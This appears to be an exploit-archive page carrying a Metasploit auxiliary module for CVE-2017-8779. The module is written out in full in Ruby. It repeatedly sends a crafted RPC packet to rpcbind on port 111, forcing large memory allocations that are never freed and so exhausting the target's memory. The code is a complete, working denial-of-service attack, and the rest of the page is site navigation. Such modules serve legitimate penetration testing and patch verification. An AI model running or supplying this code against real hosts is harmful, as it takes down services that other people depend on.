RPC Denial of Service targeting *nix rpcbind/libtirpc

RPC Denial of Service targeting *nix rpcbind/libtirpc: Posted Aug 31, 2024; Authored by Guido Vranken, Pearce Barry | Site metasploit.com; This Metasploit module exploits a vulnerability in certain versions of rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.; tags | exploit; advisories | CVE-2017-8779; SHA-256 | 9cb9f42f23398bceca7a6b058d3843930866bd713221a166b211f3635a4bab18; Download | Favorite | View

RPC Denial of Service targeting *nix rpcbind/libtirpc

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::UDPScanner

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'RPC DoS targeting *nix rpcbind/libtirpc',
      'Description' => %q{
        This module exploits a vulnerability in certain versions of
        rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
        large (and never freed) memory allocations for XDR strings on
        the target.
      },
      'Author'  =>
        [
          'guidovranken', # original code
          'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
        ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2017-8779' ],
        [ 'BID', '98325' ],
        [ 'URL', 'https://openwall.com/lists/oss-security/2017/05/03/12' ]
      ],
      'Disclosure Date' => 'May 03 2017'))

    register_options([
      Opt::RPORT(111),
      OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
      OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
    ])
  end

  def scan_host(ip)
    pkt = [
      0,        # xid
      0,        # message type CALL
      2,        # RPC version 2
      100000,   # Program
      4,        # Program version
      9,        # Procedure
      0,        # Credentials AUTH_NULL
      0,        # Credentials length 0
      0,        # Credentials AUTH_NULL
      0,        # Credentials length 0
      0,        # Program: 0
      0,        # Ver
      4,        # Proc
      4,        # Argument length
      datastore['ALLOCSIZE'] # Payload
    ].pack('N*')

    s = udp_socket(ip, datastore['RPORT'])
    count = 0
    while count < datastore['COUNT'] do
      begin
        s.send(pkt, 0)
      rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
        vprint_error("Host #{ip} unreachable")
        break
      end
      count += 1
    end

    vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
  end
end

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 18 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Chokri Hammedi 3 files
Alter Prime 3 files
Valentin Lobstein 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,937)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,979)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

RPC Denial of Service targeting *nix rpcbind/libtirpc

RPC Denial of Service targeting *nix rpcbind/libtirpc

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

RPC Denial of Service targeting *nix rpcbind/libtirpc

Share This

RPC Denial of Service targeting *nix rpcbind/libtirpc

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems